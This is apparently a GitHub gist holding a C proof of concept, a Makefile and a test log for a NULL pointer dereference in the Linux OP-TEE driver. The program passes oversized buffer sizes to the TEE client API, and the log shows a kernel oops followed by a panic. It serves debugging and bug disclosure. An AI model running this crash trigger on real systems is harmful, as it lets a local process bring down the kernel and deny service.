Skip to content

Instantly share code, notes, and snippets.

@masami256

masami256/Makefile

Last active September 17, 2025 13:37
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save masami256/11e21a7503812af7ee1e890080093a2c to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save masami256/11e21a7503812af7ee1e890080093a2c to your computer and use it in GitHub Desktop.
Download ZIP
It contains test code and test results for debugging NULL pointer dereference crash in optee driver
Raw
crash_test.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tee_client_api.h>
// Copy from https://github.com/OP-TEE/optee_test/blob/master/ta/crypt/include/ta_crypt.h#L10C1-L13C54
/* This UUID is generated with the ITU-T UUID generator at
http://www.itu.int/ITU-T/asn1/uuid.html */
#define TA_CRYPT_UUID { 0xcb3e5ba0, 0xadf1, 0x11e0, \
{ 0x99, 0x8b, 0x00, 0x02, 0xa5, 0xd5, 0xc5, 0x1b } }
// based on xtest_tee_test_1004
int main(int argc, char **argv)
{
if (argc != 3) {
printf("Usage: %s <malicious buffer size(hex)> <actual buffer size>(hex)>\n", argv[0]);
exit(-1);
}
size_t malicious_size = strtoul(argv[1], NULL, 16);
size_t actual_size = strtoul(argv[2], NULL, 16);
int rc = 0;
printf("malicious_size: 0x%lx, actual_size: 0x%lx\n", malicious_size, actual_size);
TEEC_Session session = { };
TEEC_UUID uuid = TA_CRYPT_UUID;
TEEC_Context context = { };
TEEC_Result ret;
uint32_t ret_orig;
ret = TEEC_InitializeContext(NULL, &context);
if (ret != TEEC_SUCCESS) {
printf("[*]TEEC_InitializeContext() failed: error 0x%x\n", ret);
exit(-1);
}
ret = TEEC_OpenSession(&context, &session, &uuid,
TEEC_LOGIN_PUBLIC, NULL, NULL, &ret_orig);
if (ret != TEEC_SUCCESS) {
printf("[*]TEEC_OpenSession() failed: error 0x%x\n", ret);
exit(-1);
}
uint8_t *crypt_in = NULL;
uint8_t *crypt_out = NULL;
crypt_in = malloc(actual_size);
if (!crypt_in) {
printf("[*]malloc() failed\n");
rc = -1;
goto close_session;
}
crypt_out = malloc(actual_size);
if (!crypt_out) {
printf("[*]malloc() failed\n");
rc = -1;
goto free_crypt_in;
}
TEEC_Operation op = { };
op.params[0].tmpref.buffer = crypt_in;
op.params[0].tmpref.size = malicious_size;
op.params[1].tmpref.buffer = crypt_out;
op.params[1].tmpref.size = malicious_size;
op.paramTypes = TEEC_PARAM_TYPES(TEEC_MEMREF_TEMP_INPUT,
TEEC_MEMREF_TEMP_OUTPUT,
TEEC_NONE, TEEC_NONE);
ret = TEEC_InvokeCommand(&session,
3,
&op,
&ret_orig);
if (ret == TEEC_SUCCESS) {
printf("[+]TEEC_InvokeCommand() success\n");
} else {
printf("[*]TEEC_InvokeCommand() failed: error 0x%x\n", ret);
rc = -1;
}
free(crypt_out);
free_crypt_in:
free(crypt_in);
close_session:
TEEC_CloseSession(&session);
return rc;
}
Raw
Makefile
target=crash_test
$(target):
gcc -Wall $(target).c -o $(target) -lteec
clean:
rm -fr $(target)
.PHONY: $(target)
Raw
test_log.md

system info

# uname -a
Linux buildroot 6.17.0-rc5 #63 SMP PREEMPT Wed Sep 17 12:42:59 UTC 2025 aarch64 GNU/Linux
# free -m
              total        used        free      shared  buff/cache   available
Mem:            964          60         847           0          58         815
Swap:             0           0           0

No crash

# /mnt/crash_test 0xff 0xff
malicious_size: 0xff, actual_size: 0xff
[+]TEEC_InvokeCommand() success
# /mnt/crash_test 0xffff 0xff
malicious_size: 0xffff, actual_size: 0xff
[+]TEEC_InvokeCommand() success

NULL pointer dereference happend

# /mnt/crash_test 0xffffff 0xff
malicious_size: 0xffffff, actual_size: 0xff
ERR [150] LT:TEEC_InvokeCommand:730: TEE_IOC_INVOKE failed
[  184.072289] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008
[  184.072365] Mem abort info:
[  184.072411]   ESR = 0x0000000096000004
[  184.072431]   EC = 0x25: DABT (current EL), IL = 32 bits
[  184.072461]   SET = 0, FnV = 0
[  184.072474]   EA = 0, S1PTW = 0
[  184.072491]   FSC = 0x04: level 0 translation fault 
[  184.072511] Data abort info:
[  184.072521]   ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000
** replaying previous printk message **
[  184.072534]   CM = 0, WnR = 0, TnD = 0, TagAccess = 0
[  184.072546]   GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0
[  184.072594] user pgtable: 4k pages, 52-bit VAs, pgdp=00000000401c3c80
[  184.072616] [0000000000000008] pgd=0800000048cb5403, p4d=0000000000000000
[  184.073086] Internal error: Oops: 0000000096000004 [#1]  SMP
[  184.074426] Modules linked in:
[  184.074810] CPU: 1 UID: 0 PID: 150 Comm: crash_test Not tainted 6.17.0-rc5 #63 PREEMPT 
[  184.075078] Hardware name: linux,dummy-virt (DT)
[  184.075324] pstate: 21402005 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)
[  184.075556] pc : unpin_user_pages+0x78/0xd0
[  184.076058] lr : unpin_user_pages+0xa0/0xd0
[  184.076185] sp : ffff8000843cbd20
[  184.076276] x29: ffff8000843cbd20 x28: fff0000006bc5780 x27: 0000000000000000
[  184.076479] x26: 0000000000000000 x25: 0000000000000000 x24: 0000000000000000
[  184.076645] x23: fff00000004fb5a8 x22: 0000000000000001 x21: 000000000000001f
[  184.076819] x20: fff0000008bb0000 x19: 0000000000001001 x18: 0000000000000001
[  184.077041] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000
[  184.077282] x14: 0000000000000001 x13: 0000000000000002 x12: 00000000000360de
[  184.077521] x11: fff0000001dad700 x10: 000000000000003f x9 : 0000000000000d73
[  184.077754] x8 : 00000000000007e0 x7 : 0000000000000001 x6 : 000000000000001f
[  184.077919] x5 : ffffffffffffffff x4 : ffffffffffffffff x3 : 0000000000000020
[  184.078086] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffffc1ffc0126780
[  184.078342] Call trace:
[  184.078525]  unpin_user_pages+0x78/0xd0 (P)
[  184.078708]  tee_shm_put+0x134/0x184
[  184.078821]  tee_shm_fop_release+0x14/0x24
[  184.078913]  __fput+0xcc/0x2dc
[  184.078986]  fput_close_sync+0x40/0x108
[  184.079081]  __arm64_sys_close+0x38/0x7c
[  184.079172]  invoke_syscall+0x48/0x110
[  184.079287]  el0_svc_common.constprop.0+0x40/0xe8
[  184.079411]  do_el0_svc+0x20/0x2c
[  184.079490]  el0_svc+0x34/0xf0
[  184.079566]  el0t_64_sync_handler+0xa0/0xe4
[  184.079665]  el0t_64_sync+0x198/0x19c
[  184.079916] Code: aa0203e3 eb02027f 54000109 f8627a82 (f9400444) 
[  184.080254] ---[ end trace 0000000000000000 ]---
[  184.080568] Kernel panic - not syncing: Oops: Fatal exception
[  184.080834] SMP: stopping secondary CPUs
[  184.081207] Kernel Offset: disabled
[  184.081299] CPU features: 0x000000,0000d180,2bbe33e1,957e7f3f
[  184.081440] Memory Limit: none
[  184.081713] ---[ end Kernel panic - not syncing: Oops: Fatal exception ]---
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment